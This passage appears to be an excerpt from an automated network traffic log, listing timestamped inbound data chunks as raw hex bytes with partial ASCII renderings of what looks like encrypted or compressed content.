dc 52 df c1 33 48 1e 1e e8 e9 93 0f d4 2b 1d 6b 8a 4b ae dd c4 85 1c 2b e4 a5 42 db 65 72 5f ab Data Ascii: )<VNT-oy<~m\|RqcUo9I~Pw( {fg<SeiGoO!ulVA[<FoD37@Q'FasxsI,$ 'gG68G8kXCTJ(*@3R3H+kK+Ber_
2023-10-13 13:21:13 UTC	3880	IN	Data Raw: de 48 e7 e0 25 2e e0 55 d9 ba 56 d2 e4 d4 85 bf 48 70 6b fa 54 4d ac 8c 8a 9d 37 4f e6 a3 67 21 0b 6f 6a 0b 1a 26 9d ca 89 99 df 0e c4 21 b0 ac 8b a0 f3 3d ef 08 5c f7 98 7b 3a 4e ae bb e0 5b 3c ef d0 a4 f0 c9 f6 9a c8 41 b7 b8 d6 1f 16 4e 2e 19 4a 76 7b 13 3b f1 de b6 10 8e 94 39 ee 69 92 77 f7 08 6e 1f 05 7b 3e da 05 39 53 06 50 80 c8 c5 98 61 4c 72 6f 79 43 fd fb 60 de 06 ad f6 71 14 d4 bb 0b c4 1a 45 65 b6 a3 45 c1 31 0c ca 9a 02 97 3b f7 39 fd 64 bb 0e b8 f9 1e 8c 43 12 38 ef 94 97 99 c6 ce 22 72 cd 62 09 98 40 e2 81 f5 ec ed e3 39 ab cb a7 b2 14 b0 71 b5 67 85 bd af 74 42 80 08 b9 9c 88 f2 24 54 cc c8 eb ed e2 67 a0 f3 34 e1 4b ea 8f c7 20 4b fb 61 23 28 85 9c 5c d0 3a 89 ad 99 bc 21 69 a7 b1 96 de 9f d9 0b 39 5e 50 68 1b b5 a6 77 76 7f 7b ff c8 27 Data Ascii: H%.UVHpkTM7Og!oj&!=\{:N[<AN.Jv{;9iwn{>9SPaLroyC`qEeE1;9dC8"rb@9qgtB$Tg4K Ka#(\:!i9^Phwv{'
2023-10-13 13:21:13 UTC	3896	IN	Data Raw: 29 a7 17 a8 5b 50 86 7b ba 30 d9 60 db bb bf cf 67 08 76 8f b8 fd 83 a2 3f a3 40 92 3f 7f 83 31 89 60 ce c8 c7 c9 c4 66 06 96 e7 49 5c 7d 84 64 ff 00 ec 4f a8 59 66 4b 38 c5 a6 10 6f aa e5 ba bf b6 71 d8 d9 7a 7f 66 65 a7 98 af 20 82 f2 71 d8 c7 6c fd 4c d8 42 be e2 dd 99 c9 27 66 7f f9 05 79 13 d4 2f 5d 0f f9 c1 20 7d a2 e1 c2 4d 53 a8 41 69 1b a5 7c 3f 79 15 69 4c 58 84 82 c2 1c 2c da eb 64 31 36 0d b6 31 cd 04 bf d5 da 1b b0 42 c4 b6 6f 14 15 13 1e da 95 64 74 9b 90 08 51 3b 01 54 b1 3b ab f3 15 40 9b 8a 8a 02 7b ac 09 43 2d 41 a5 28 a0 01 48 6c 34 23 8c 9f 45 e3 b9 91 b6 19 71 13 3e 2d 6f 21 bb 9f 1c 42 6f 6a f4 1b 45 61 ef b8 3f e1 17 65 93 0a e1 54 f9 8a e2 82 f5 e5 b8 fa 32 93 99 1a f3 1a 8e 38 63 da c6 0a fd ff 3d b8 ef ac 2e cd 36 fe dc 2d d7 24 Data Ascii: )[P{0`gv?@?1`fI\}dOYfK8oqzfe qlLB'fy/] }MSAi\|?yiLX,d161BodtQ;T;@{C-A(Hl4#Eq>-o!BojEa?eT28c=.6-$
2023-10-13 13:21:13 UTC	3912	IN	Data Raw: 9b 64 b6 1e 65 40 51 c1 ed f6 1a 13 5b 30 19 52 3e 0c 9c 2c a6 6f 14 88 d4 f1 42 c6 c5 50 00 85 ec 58 42 ac 14 b4 e8 21 92 e7 42 b1 7a 1b 7a 92 dc 4b b3 99 8f e3 6b b1 54 e3 de bf 75 f3 90 4c 2f f7 97 72 69 e8 25 94 46 d6 8e 04 32 6f a7 76 fc 39 69 fe e6 44 2c c9 6f ac c1 b8 82 e6 7a a7 17 c4 5a 04 18 6c f7 1d ae ae c3 ad f7 d7 8f f6 32 ca e5 7a eb d2 25 81 9c 52 0f df 20 b9 b3 27 19 64 73 a1 21 6f 4c 1b 50 2c af 57 37 ba ab ff 67 d9 44 c4 5e ce 69 1e 48 07 03 10 b0 a6 49 cd 70 8b 8a 5e ab a5 20 95 31 08 6a df 21 7e d5 de c8 c8 a0 44 31 f0 d9 83 98 cf e8 58 d9 26 3e d0 7f 4c 07 08 90 92 ca 47 af 68 e8 45 f8 37 44 79 4a f0 8f 60 6b c2 1d 42 e6 8f 51 f2 ae 1b d1 b1 46 eb fe d1 5d 3a 69 8d 4d 55 dd f6 7f 84 0e 87 1f 94 46 6e 9e 0b b2 b2 25 49 3e 6c 09 a9 c3 Data Ascii: de@Q[0R>,oBPXB!BzzKkTuL/ri%F2ov9iD,ozZl2z%R 'ds!oLP,W7gD^iHIp^ 1j!~D1X&>LGhE7DyJ`kBQF]:iMUFn%I>l
2023-10-13 13:21:13 UTC	3928	IN	Data Raw: b5 b1 7d 17 fa 63 02 02 0f f9 1a ec e4 5c 74 6a 01 0c d3 74 86 ec a6 ae 66 11 ca 96 0d 89 17 f2 0d 29 b7 73 9a 47 48 e3 50 b5 bf 27 b6 56 fd 69 b6 99 c1 78 c7 85 75 61 18 c3 f4 e5 59 99 d4 9f af 34 2c 8b 79 69 0c 4a e4 88 b4 59 e8 61 6d a0 d5 e9 b4 81 a8 21 e3 8e 5f 8f a0 f9 45 fc e6 45 0e ed cc 1c f1 17 65 c8 ad ee d1 cd ec 68 a1 b5 bc d7 7a b6 0a 3b 98 97 02 38 84 90 4c 95 cb a4 4c d5 d7 d7 7d ff 3c de 09 4d 1e 70 ec 67 3d f6 58 ad df 6c cd 6f 4f 20 72 2d 75 c9 7b 84 85 67 0b 3f fd a8 c4 f1 7e 61 ab 4e 94 82 eb 54 20 6f 7c 2e 25 65 cc fa 61 cc 75 f9 e8 79 8a 10 60 13 aa b6 79 6f 24 0d 47 4c ff 1f b3 d0 79 4b 99 c8 e0 99 96 6f 8e 80 b3 33 0a f8 3a 78 61 29 a1 71 32 e8 9e 7d 89 e8 f5 8f 3f 50 1c 85 f0 c8 6e 17 bb 60 c1 29 d6 1b 7e 24 96 17 f2 52 1e 9c 87 Data Ascii: }c\tjtf)sGHP'VixuaY4,yiJYam!_EEehz;8LL}<Mpg=XloO r-u{g?~aNT o\|.%eauy`yo$GLyKo3:xa)q2}?Pn`)~$R
2023-10-13 13:21:13 UTC	3944	IN	Data Raw: c7 8e 4d 79 ca b3 8e 4b 1d 88 e4 a7 12 31 92 e5 1e 4f 62 36 9f a0 ca 68 a1 8f 3e 3c 32 a7 df 75 e6 cc 11 eb 5f 49 60 46 81 43 8d 04 68 59 34 10 27 a4 31 db 30 80 62 81 06 f2 f6 6c 39 58 e0 d1 2c 92 e4 40 3f 72 c8 61 cf b2 75 c0 61 83 fe 67 88 e0 eb e1 84 1c 7b 27 3a f7 19 85 a1 6a 33 90 98 71 77 09 f8 ad 62 a6 e5 5b e8 b3 73 ce a6 d0 5e c3 2e ba a3 03 6c 41 eb 47 fd 76 06 14 86 ca 62 6d da 8b 09 5f a5 a5 fd 76 f5 c1 36 61 e2 b2 45 2d b0 fd 18 e0 24 63 4d ec 93 3a d2 d3 af f3 2c 84 95 ea 77 b9 49 59 6d 53 cb a5 7b b1 89 11 59 2a e1 60 02 67 09 f1 08 fe 83 7d fa d9 d8 73 7c 0f 69 3a 14 79 4a f1 50 d7 6e a1 d3 c7 be d8 a0 42 13 bd cc e5 cd 0c 10 88 be 78 60 bd 10 54 71 2e cd 33 93 6d 2b 18 14 bf 52 aa cb 7b b4 b2 aa 36 48 40 de 0e 80 d3 f8 b9 a6 ef 2e f5 77 Data Ascii: MyK1Ob6h><2u_I`FChY4'10bl9X,@?rauag{':j3qwb[s^.lAGvbm_v6aE-$cM:,wIYmS{Y*`g}s\|i:yJPnBx`Tq.3m+R{6H@.w
2023-10-13 13:21:13 UTC	3960	IN	Data Raw: 6c c2 bc 0f 62 fc 1b 75 18 94 88 03 d4 69 eb cc 73 3e c7 34 97 96 2d fa c9 a9 01 28 12 fa bd 00 bd a7 20 cc 01 95 2d 79 a9 50 fb 02 95 5a 53 db e4 25 23 e3 7a 2a ef 02 28 8d 59 06 e3 7c 36 d2 06 67 4a f2 d6 a8 b6 10 43 70 54 90 8b 71 07 a3 d2 58 e3 52 5e 8b 73 1f 6d ed e6 97 86 9a bf 06 16 75 19 2f af 70 4d fc 3e 00 7e d5 c7 4a 6b 53 89 4e bf 0c 84 b9 f5 d8 57 5f 2e 65 e5 c8 1f a1 6a 72 9e a6 80 24 57 84 02 d6 f2 d4 aa 64 7e 4e e9 04 89 62 c8 ae 20 2a 61 50 9b df 50 3c 67 13 83 d0 d6 b4 a1 76 8d ad e8 60 ee 54 30 ca 48 a0 7d 9c 98 1e 90 c9 5f d8 7b 0d 61 a6 23 75 46 71 5a f3 a7 81 a1 8b 2c bb e3 d3 62 fd 15 da fa 24 36 11 41 2d fe 78 d9 ce a1 d0 ea 61 0f 81 7f f3 0e 98 52 72 24 01 c1 8e 8a 56 2a c1 8a 0b c9 c6 2e 95 0c 62 e0 87 70 35 ca f7 ef 7d 11 78 27 Data Ascii: lbuis>4-( -yPZS%#z(Y\|6gJCpTqXR^smu/pM>~JkSNW_.ejr$Wd~Nb aPP<gv`T0H}_{a#uFqZ,b$6A-xaRr$V*.bp5}x'
2023-10-13 13:21:13 UTC	3976	IN	Data Raw: 4d 3d 09 0a 6e d3 49 43 3f ac c6 eb 3c 9a cd 6b 49 15 3e c8 15 33 d1 50 1c b1 8a 8c 89 91 66 49 3a 88 38 36 f8 42 e5 af b3 d2 06 31 fc 59 1a 05 9b 24 b6 42 f3 ce 63 aa ba 86 a6 94 cb bd e7 47 9c b5 0d 8c 51 cf 0f 07 96 14 ca 36 03 de 8e 61 ca 49 e0 1b fc 2a aa d8 cd d9 3c a0 60 04 b4 32 0f c4 35 cc 13 0c b3 35 72 75 30 99 29 8b 50 c2 d0 66 fc a7 27 ec af 48 20 c1 d3 5e 5a 0a a4 f1 4c 1a 75 87 6c 40 00 d0 7a 9a 78 c9 06 e0 74 53 97 3c 6a cc 82 31 be 8c 6e 0d 0c 15 8c 17 84 88 16 73 46 06 4e d5 9c 02 b0 9e e6 d0 1a 66 2a da 5b 84 05 65 6a 87 5d 5f 47 bc 8a f5 0c 1d 82 c0 a6 3f 17 2f 03 8f 0f 5a e5 7c e5 04 e6 6f 78 de 54 c7 51 d6 2f 03 a0 28 28 40 60 d6 9a 82 76 4e a3 06 74 78 95 80 95 5a 6e 05 15 00 ba 6f e4 3a 4d c3 e5 db ab 75 33 89 bf c1 71 da 01 8b 40 Data Ascii: M=nIC?<kI>3PfI:86B1Y$BcGQ6aI<`255ru0)Pf'H ^ZLul@zxtS<j1nsFNf[ej]_G?/Z\|oxTQ/((@`vNtxZno:Mu3q@
2023-10-13 13:21:13 UTC	3992	IN	Data Raw: 32 85 31 5c 82 74 b1 57 e1 99 8d 39 a2 7e 0a 25 84 90 59 ca d2 bd 5c 3c 87 66 dd bb 04 f9 63 a9 62 5c 11 0a 70 53 7d 91 78 bb 6b 9d b3 9a d5 7b 5a 15 55 7d 65 d9 cd f9 fb f8 c8 03 0a 37 a0 5d 51 29 8b a5 eb c1 a1 9e a7 d9 73 4c 42 4a 9f 47 72 e9 79 0a 50 0d 22 96 df 09 b1 1b 59 46 ea 0d 0a 29 3f b8 a2 01 22 e2 c0 12 a7 cd 2f fe b8 f4 c3 39 b1 2a a6 6f c6 1a 97 fd 5b 4b 87 7c e4 75 16 55 ad eb a0 2a 03 7d 8d 54 29 c6 0f 2a a6 1a 6d 9b e3 41 53 d1 bb 7b ac 70 e8 11 fc cf df 67 48 c1 1b bf 63 5e 3d a5 d4 07 d0 ae 41 07 67 43 9b ea 41 4d a2 90 b5 eb 47 fc a1 07 97 88 65 1e f9 e9 54 8f f4 bb b4 ff 38 3e 67 8c 03 82 ec 6b 4a 18 90 28 6e 77 88 5e 6b 14 e7 41 7d be 2b 76 df 3f d5 f6 9e d9 6c da b7 f9 30 35 bc 24 9c b0 38 7a ef 84 09 02 bf 77 dd d4 7b 01 2c 1f c7 Data Ascii: 21\tW9~%Y\<fcb\pS}xk{ZU}e7]Q)sLBJGryP"YF)?"/9o[K\|uU}T)*mAS{pgHc^=AgCAMGeT8>gkJ(nw^kA}+v?l05$8zw{,
2023-10-13 13:21:13 UTC	4008	IN	Data Raw: ff 50 54 2d ab 54 d2 2a b2 d0 e5 bd 69 f1 5f f5 f6 20 df 34 45 f1 f3 d9 05 4a ff c4 6a 2d 46 c8 94 e0 7a 8d ac 82 d3 ed bd fa 08 d0 b0 1a f2 3a c1 59 06 d2 90 68 84 e4 88 bd 6a 80 10 f6 15 72 b7 e7 92 ce fc 06 21 e8 c8 3f d3 df 50 42 ba b4 d4 d3 e1 c7 41 fc db dc 6c 16 c2 f4 fe 2f fa 55 33 b9 db c2 3f 22 5a 30 58 76 98 14 8d 58 03 ea 2d 91 0b 8d 38 3c d9 7a 65 48 37 09 d9 24 26 5f 5f b3 a0 49 41 02 a6 75 88 22 a7 bd 50 64 07 07 b4 16 5c fa 8e 0e e4 f8 14 4d 6e 3b 17 e0 90 a4 03 39 dc 36 bb 7a 43 d2 c9 fc d0 5b 79 79 b1 22 98 ad df b0 b2 f4 63 a7 32 8c 6f 60 28 1e f4 76 f8 4d 10 a2 13 e2 8a b3 3d c4 49 d2 11 45 0f d2 a8 02 2c e1 88 b6 d5 83 a5 55 ec 92 c0 c8 dd 39 93 23 1c da 20 b7 e9 17 38 b9 ba bf b2 ca 6b b7 67 31 95 7d 59 08 00 75 06 65 e9 eb 7c e5 74 Data Ascii: PT-T*i_ 4EJj-Fz:Yhjr!?PBAl/U3?"Z0XvX-8<zeH7$&__IAu"Pd\Mn;96zC[yy"c2o`(vM=IE,U9# 8kg1}Yue\|t
2023-10-13 13:21:13 UTC	4024	IN	Data Raw: b4 b7 1b 5a ce d8 a3 13 6b 99 56 62 81 70 5a 83 fa 32 e9 98 c7 95 bd 26 24 e0 6f 1b a6 95 95 69 b4 3a eb 8c 03 50 78 20 f2 f2 19 5b 98 fe 65 2e 2c 0a fb 94 53 db 7c f8 13 c2 da 28 88 13 19 66 ce 4f f3 ea 61 ec f8 a8 89 dc db 25 e0 a8 d2 98 87 08 48 cb 37 3a f9 d1 bf a6 dd f7 2e 68 6b da 0a e7 11 83 56 1b 5c d5 46 5a af 9c fc e8 bd de 2a f2 9c b9 cc 59 65 a2 df 11 d3 59 b8 ee 81 f5 94 0c a2 48 b9 7d 4a 7d ee 96 7d 7d d2 44 fb b0 fb 6b 44 01 57 35 d5 74 68 d8 7f 3e 5a 3b e1 05 4f e6 a5 5a c4 81 f8 4a 96 05 d2 5f b1 2a 08 1a a4 b6 00 2c 8b 46 9d 0c 86 ed c9 54 03 56 a9 3d f4 7b 04 76 ab 55 86 a9 b9 1e fe 03 4d 32 11 72 e8 49 af 48 ef de 14 e3 58 02 54 ed b9 62 3a 52 a5 91 74 ca 48 b6 b1 09 26 08 d2 f7 c9 c4 ac 53 c4 12 1f ac 4e df 81 fd a5 77 e9 ae 29 b6 1d Data Ascii: ZkVbpZ2&$oi:Px [e.,S\|(fOa%H7:.hkV\FZYeYH}J}}}DkDW5th>Z;OZJ_,FTV={vUM2rIHXTb:RtH&SNw)
2023-10-13 13:21:13 UTC	4040	IN	Data Raw: c8 31 79 10 b5 5a db a0 ea 41 22 af de 2a d3 95 99 64 e6 cc 91 29 ca a3 15 ec 12 11 8b 7d e7 7c 4e de d6 3c 31 ed 9c aa b9 5b ee ef 27 76 c2 3e d0 d2 23 32 e6 4e c2 d4 db 4e f6 ff 22 85 cf 1f ee e0 78 42 d1 0d e5 25 65 13 29 2d ff 51 4d 7b ee db bc f3 4a f6 14 a9 58 40 53 c1 61 66 7e 9d 71 e3 86 2a e5 14 99 79 84 0e 68 62 63 d5 d7 36 70 a6 e2 91 eb dd dd d2 f1 7d b7 d9 00 c9 ee d0 35 8b af 14 42 69 8a 07 1b d4 11 42 91 85 ee 11 17 d8 6b 94 ef 74 46 40 38 f1 af 5e 48 68 7c a3 2b ec d0 34 bd 9a c2 f8 a7 ad c3 11 62 c4 91 cc 3a c8 8c e0 28 27 86 3b e8 91 d8 73 02 53 3d 26 1c 91 19 30 9d b5 63 ae 0f 03 ee ba 43 85 78 99 47 5e 21 48 cd ae 7c ac f1 90 81 fb 54 ae bc 93 a1 5f a1 92 37 c9 64 c5 96 f0 72 2f ff ca ee e7 37 30 be 53 c1 8c f2 cc 78 36 1d bb ea 00 58 Data Ascii: 1yZA"d)}\|N<1['v>#2NN"xB%e)-QM{JX@Saf~qyhbc6p}5BiBktF@8^Hh\|+4b:(';sS=&0cCxG^!H\|T_7dr/70Sx6X
2023-10-13 13:21:13 UTC	4056	IN	Data Raw: 13 a2 58 1b b9 b8 a7 c4 fd e7 f8 a1 b5 25 64 3b 6a 4e 0d c7 74 c5 09 76 15 ed c8 c4 f8 39 d0 12 bb 7d 8e 91 97 1f 41 d5 fc c5 26 d3 d1 1a a4 68 15 06 c1 c0 91 de 7d ec 04 4c c2 03 28 b4 36 7c 9d d2 21 70 05 94 b0 6b 8a 4a 58 f8 55 84 20 a3 b7 e5 27 b3 cb 9f 9b 30 a2 86 e3 d0 e0 56 b7 ee c1 14 1a 04 b4 7e d5 eb 3f 0a 94 2b d2 63 44 6d 25 de b1 d3 f5 6d a7 d2 9d 0f 67 4e 1f 9f 21 7d 55 6f 82 38 6a b9 c4 c1 ae a9 07 9b 3b 0a ff 2e a7 95 51 58 a2 7d 59 4a f2 69 25 ce fd cd 67 bc 7d e3 9d 21 69 be 2e 83 21 a0 6c a1 0a ec c1 64 44 b2 1d 81 cd 85 2a 67 1a 5c fa c5 74 89 2c 00 ab fa 1c 89 4f ba 9e dd 1f 85 06 34 0f 87 53 79 23 e1 88 5f 5c 11 eb 1b 59 7b 60 f1 4a 80 43 0d 14 e6 4f 30 f2 22 80 36 a5 27 1c c4 3f 74 af 2d a9 2e 01 37 8b 50 fc 4b 2a 96 71 f5 bd 55 65 Data Ascii: X%d;jNtv9}A&h}L(6\|!pkJXU '0V~?+cDm%mgN!}Uo8j;.QX}YJi%g}!i.!ldDg\t,O4Sy#_\Y{`JCO0"6'?t-.7PKqUe
2023-10-13 13:21:13 UTC	4072	IN	Data Raw: 46 7c e7 3f 57 15 53 92 32 e2 d5 a5 9f a8 88 89 be 67 6b ea f4 d6 8d 43 19 0d 94 01 ba 59 40 fb 91 2b 71 1b de 04 48 41 95 c3 bd 4f 67 f8 95 b8 d7 41 e8 48 fd c9 cc b5 e0 df 87 5b 1b c4 8d b6 00 5b cb 5a f4 02 88 68 00 b4 0a d8 56 af fd f4 a6 36 90 fc 53 7d f0 9f e9 2a 14 2a d5 83 87 9c 1d 35 f5 e2 9b a2 33 ef 31 ae 51 94 41 22 41 fd 21 0c 78 06 af 63 73 17 8a 3c c3 bb 55 fd 46 6d bd dc 7f 10 04 c7 8f db 44 6c ea 81 6a 66 c2 1f fb 79 35 5e 92 d6 52 cc 5b ae 93 60 04 f7 11 fa 54 58 cd 88 70 14 ba 21 12 f0 3b 8c 89 df 89 1b 93 b4 3c d6 e4 3e e2 14 a7 aa aa 38 0a f2 92 fe bb 74 4f 48 4c 73 e2 70 30 bd ff 1a 07 f9 d6 1b 85 6f ed 23 16 05 5c dc d6 79 98 39 41 6b 17 49 ff af 64 59 3c 45 1b ed a5 c2 d9 0e 96 aa 5a af f4 1b 07 70 4c ba cf 11 4c 9e 25 a7 3a be a8 Data Ascii: F\|?WS2gkCY@+qHAOgAH[[ZhV6S}**531QA"A!xcs<UFmDljfy5^R[`TXp!;<>8tOHLsp0o#\y9AkIdY<EZpLL%:
2023-10-13 13:21:13 UTC	4088	IN	Data Raw: 59 90 f9 26 28 14 f1 03 3c f0 fe 52 8d dc 7f 28 76 86 2e a4 c4 75 f8 43 1d 32 05 7f 5c 1f 3e 80 e4 37 0c f3 23 f1 c3 9c 46 fd d9 0b 3c fb 9e 81 2e be 98 d4 d3 ba 48 0e 57 75 44 a7 7a cf c2 04 08 35 f5 1d 4a a3 ae 47 3f fb ee 45 e6 2e ce 7e 8e 46 a5 19 ca bf 7b f4 df 31 9c cd c1 23 b0 1e eb ca 89 88 ce 7a f5 19 78 9f 9c dd d8 00 aa a0 87 66 f2 59 b6 27 9f 61 9b e8 c7 79 cd 2c eb 17 66 6e d9 f3 3e 20 d5 99 b8 dc 62 ed 43 db 7c 03 4f 1f 18 e2 9d 74 15 9b 1e 23 53 ba 2d 9e 0d 6d 23 4d 46 18 c8 10 9c 26 f0 44 9b b1 00 d6 5c 92 d2 77 03 2b a2 ee 47 fe 81 a0 79 b8 ff a0 c7 08 b3 b8 df 92 3f ff 20 43 c3 f8 3e e8 2c c6 cb 27 c0 c1 a8 b4 e2 52 b9 81 ac ce 4a ab 0d 39 a1 02 76 ea a0 ac 21 b2 30 3c cb 0e 0a 91 7d a9 e5 fb 95 0c d0 a7 4c 2e 6b fa be aa 5f 04 b7 1b 35 Data Ascii: Y&(<R(v.uC2\>7#F<.HWuDz5JG?E.~F{1#zxfY'ay,fn> bC\|Ot#S-m#MF&D\w+Gy? C>,'RJ9v!0<}L.k_5
2023-10-13 13:21:13 UTC	4104	IN	Data Raw: dc 49 f5 3a 05 0e 42 34 d5 fa 59 4e e4 7f a0 5a 73 78 2b 1c bc e6 5d 4c 55 56 d7 cc 26 d0 d5 0b 05 42 a4 79 09 88 8b f4 f7 1b 43 27 f0 96 b1 1b c6 cd eb d4 d4 a1 cf 40 79 3d 54 7d b8 a2 ec a9 6b 57 26 9f c8 22 01 c7 89 d2 01 61 98 f9 17 6e 8f a2 fd 8c 35 d3 23 4e 47 d0 a4 4e 3f 1b 19 b2 5b b5 ee 70 46 ad 80 00 27 4f 99 3a f3 e0 8e 47 f1 cc 34 ec f4 ff 5c 33 04 27 fa 02 c2 13 20 ef 5e 52 3e e5 26 84 cc 6c 6f 2a 1f ca 4b 8a 1c 35 12 31 5d 5b 61 f0 40 51 0f ef 8f 39 2f 2c a3 27 99 10 dd 17 95 db 04 f7 5e 3c 7b 80 a7 e0 40 57 cb b8 f0 eb e5 95 f8 de d9 27 93 90 02 1d df a6 36 cb 95 5f f3 d1 9f a8 a2 d4 ba 93 9e 36 aa 89 9d 8b 2b 7c f8 a2 c7 43 b7 2e 12 9d c4 51 72 78 62 d7 11 1f 5f 74 d5 aa 2a 88 c0 94 10 cc 69 40 9f f3 a9 34 20 fb 72 9e 89 eb db 07 0a 01 e1 Data Ascii: I:B4YNZsx+]LUV&ByC'@y=T}kW&"an5#NGN?[pF'O:G4\3' ^R>&loK51][a@Q9/,'^<{@W'6_6+\|C.Qrxb_ti@4 r
2023-10-13 13:21:13 UTC	4120	IN	Data Raw: e9 57 4c 8d 46 0d c4 8e 57 bd 2d 45 df 16 6a 91 8e 49 fa 01 4b 11 d3 db a1 78 57 8d 74 b5 7d 7e c7 b2 98 1e b6 d8 45 f2 3d 61 5f 51 ea 03 46 0a 8f 20 d0 f0 b6 14 53 08 df eb 17 d7 ca 00 aa 87 59 3c d9 9b 28 6d 76 fd 01 3b b2 d8 a6 c1 97 c0 3a ad 45 41 12 50 7f bb e4 87 14 35 3e 93 98 58 8c 75 51 87 bf 97 49 89 1f 9f 3e eb b4 ba e9 01 17 0d 1a 91 ab 68 73 2f 52 6a 36 d7 8a a6 c7 9b 26 0d ae 29 17 54 7a 80 c2 52 26 87 48 77 e9 29 df 30 ac 87 b3 04 b9 1b 1a 04 24 64 f4 e7 3f fc 7d 98 45 23 e3 1a 87 e7 76 6f 0b ef 84 41 f6 d9 ef c1 79 af 48 f5 f9 2b 1a 72 60 aa f8 8f 1f be 47 84 ff e8 6c 18 40 79 9d fc db cb a4 93 68 2f 39 c8 f9 95 27 52 d8 2c d9 bf 65 09 f1 49 86 ab b6 55 45 77 a5 a5 1d fa 6d 70 a4 a4 20 7f 67 93 d2 51 b2 9b 57 df fd f2 ab 13 86 6a e4 9f 02 Data Ascii: WLFW-EjIKxWt}~E=a_QF SY<(mv;:EAP5>XuQI>hs/Rj6&)TzR&Hw)0$d?}E#voAyH+r`Gl@yh/9'R,eIUEwmp gQWj
2023-10-13 13:21:13 UTC	4136	IN	Data Raw: e6 25 d8 61 70 53 d5 8d fc ac bd e6 a4 36 06 38 cf 6c 18 30 31 54 c9 09 f0 0f 07 4c 3e af 70 05 dc d2 57 7f a7 e2 6d 99 e7 85 0e 0f 91 d4 a6 8f 9e 27 e3 f3 25 be c3 fb 1d b6 65 83 a2 8d a0 64 d1 d2 2a 36 7d c1 f6 10 64 99 7e f8 e8 ba ea f0 e5 b4 3b 51 2c 57 37 83 f5 f1 e2 ed 7e b7 9c 7b c9 8f e2 28 63 b5 21 2d e8 4b 3d 8c ce 10 fe d2 32 66 16 64 f6 59 e5 a0 30 0c 95 4f 4d 63 26 b2 89 a5 f2 5b e0 c0 1c 4f 01 41 f5 96 fa 9f 2f 3e 9c 68 37 cb d7 97 ae 9b f1 ee 3d 56 19 63 d4 42 e4 fc c3 c5 43 73 97 e9 9e 7b 40 00 03 e3 22 db ca 54 af c7 8c 16 6b 3c 20 71 fd 69 dd 16 e7 57 ac d3 6d 07 24 96 71 63 69 5f b9 ae d7 8a 11 62 d4 b2 76 a7 2c db 2b fa 15 b7 2a 4f a4 19 69 a8 fd 01 f0 b3 40 48 04 06 3d 68 ca 8e f1 bc 70 f6 cc d6 71 8e 3c 32 9f fa b0 b4 4f 38 0d 7b 7e Data Ascii: %apS68l01TL>pWm'%ed6}d~;Q,W7~{(c!-K=2fdY0OMc&[OA/>h7=VcBCs{@"Tk< qiWm$qci_bv,+Oi@H=hpq<2O8{~
2023-10-13 13:21:13 UTC	4152	IN	Data Raw: 12 85 06 58 1c ef ac 06 8f 85 c6 6b d0 2c 25 3c 28 17 97 18 68 6d 97 c2 61 95 c7 b2 b3 8c 60 ec 44 fc 4c a2 b0 c0 66 73 29 4b d3 c6 e4 20 05 4c ce 6b e6 5d bd f8 a1 82 c0 c2 30 bd d4 d5 05 12 04 46 35 fb 25 4d 0f c5 23 4a 4b fb 8a 8b b2 7b 6d fb 23 bf 80 76 92 b5 b3 a5 48 e7 3f c1 1f 46 f9 c2 7f da e8 92 6c 34 4c 4f 4f 3e ed 9f bb fd 30 ff 68 48 81 c6 df d5 bf 66 5a af c1 00 c1 1e 6f 35 b2 f2 32 4e af 2d c8 39 1f 5a 3f 59 52 da e8 c5 d4 57 30 c4 85 51 bc f3 74 45 96 d4 51 6f 31 64 4f a8 a2 4e 54 4b 51 9e db 0a 8a e1 58 8c f4 81 46 8e ff 1b d3 96 42 7e 48 74 20 4c 69 ed e7 db fb 5e 02 82 73 c3 54 ad bd 32 10 f2 56 0e 30 ec 56 a8 0e 59 16 f4 e1 4e 97 3d 4c ed ef 02 14 c8 09 f0 83 c8 dd 31 2e 40 18 c0 ed 82 1c bd 91 1f 01 26 54 fe c9 3a 0a 90 2a 74 b5 fa 7a Data Ascii: Xk,%<(hma`DLfs)K Lk]0F5%M#JK{m#vH?Fl4LOO>0hHfZo52N-9Z?YRW0QtEQo1dONTKQXFB~Ht Li^sT2V0VYN=L1.@&T:*tz
2023-10-13 13:21:13 UTC	4168	IN	Data Raw: dc a8 6e 26 eb 18 dd 0f 7b ac ec 1c 2e bf 77 fb dc db 09 7b 52 47 83 cf 3f e2 02 e4 45 b7 ae 63 85 34 31 4d 4c ab f0 6b 71 79 2e 0c da 21 62 b4 25 69 4b b0 f1 83 20 ac d2 b8 3b ed e9 a3 83 7b 60 96 08 bf e0 b2 1f 8b 07 1c b3 4c be 9d 13 ea 75 f9 d0 db b5 c1 fb c9 54 92 ea ce e6 4b ca a6 03 0b 8e 12 53 99 b9 d5 2e 9b 99 5a 36 be 38 9e b3 47 6d d2 9c 5e a2 1a e6 d9 c6 14 19 4b 91 b3 03 19 01 90 86 07 4a c8 89 21 ce 12 63 6c a5 12 20 c1 2e d1 0c 81 72 f0 d2 33 ff fe 49 ba cf bf 30 ab ee 52 6d 05 17 46 66 23 47 68 e8 48 79 a9 2b 68 d4 25 26 51 a0 02 7c 0d 9b 40 45 9a ec 4d aa b6 c7 8c 79 7a 32 93 65 49 dc 0e 5d b1 1c f2 96 f5 ab 69 bb f7 71 de d1 f4 0d 56 b4 a7 bb 63 5e 53 28 0c ee 3b df cd 99 d4 d1 6c a2 6d 99 52 60 3c 46 d5 e0 2e 7a 31 1f bf e5 6d a5 09 70 Data Ascii: n&{.w{RG?Ec41MLkqy.!b%iK ;{`LuTKS.Z68Gm^KJ!cl .r3I0RmFf#GhHy+h%&Q\|@EMyz2eI]iqVc^S(;lmR`<F.z1mp
2023-10-13 13:21:13 UTC	4184	IN	Data Raw: 64 be a5 73 1b 1d b5 e1 3e e1 96 a1 c4 f6 e4 a1 e5 8b 01 17 c0 aa 4a 30 23 5a df 94 ab 41 d5 be 95 b9 83 fa ce fd 48 9b da d0 a8 57 a3 17 9b a2 31 78 28 50 96 74 a6 da 8f 85 0a 65 d8 6b e0 99 33 8f 4f f5 37 c6 06 80 a3 c0 eb 51 c8 7a c4 90 ca 81 39 b3 e6 70 2d c2 83 f3 6f 5e ae e7 f8 42 07 b5 54 b7 40 28 5a 9e e9 0d 03 ee 48 b0 e6 c0 f2 ea d2 c6 45 dc 47 fc 65 c3 7b f5 2f 26 26 36 f8 f0 c7 a3 84 49 53 1c 37 2c 7e ad de 14 e5 64 f5 f8 b3 7d 5f 1d e9 2f e3 47 3c 3c f2 a3 81 8e 76 ef 76 aa dc e2 3c c9 31 bf 8f 21 5f 7a db 94 1a d9 b4 ef a0 3a dd b2 d5 2a db cb 04 14 b5 36 a5 87 5a a2 49 17 ae f2 fa 3a b7 ee 0d 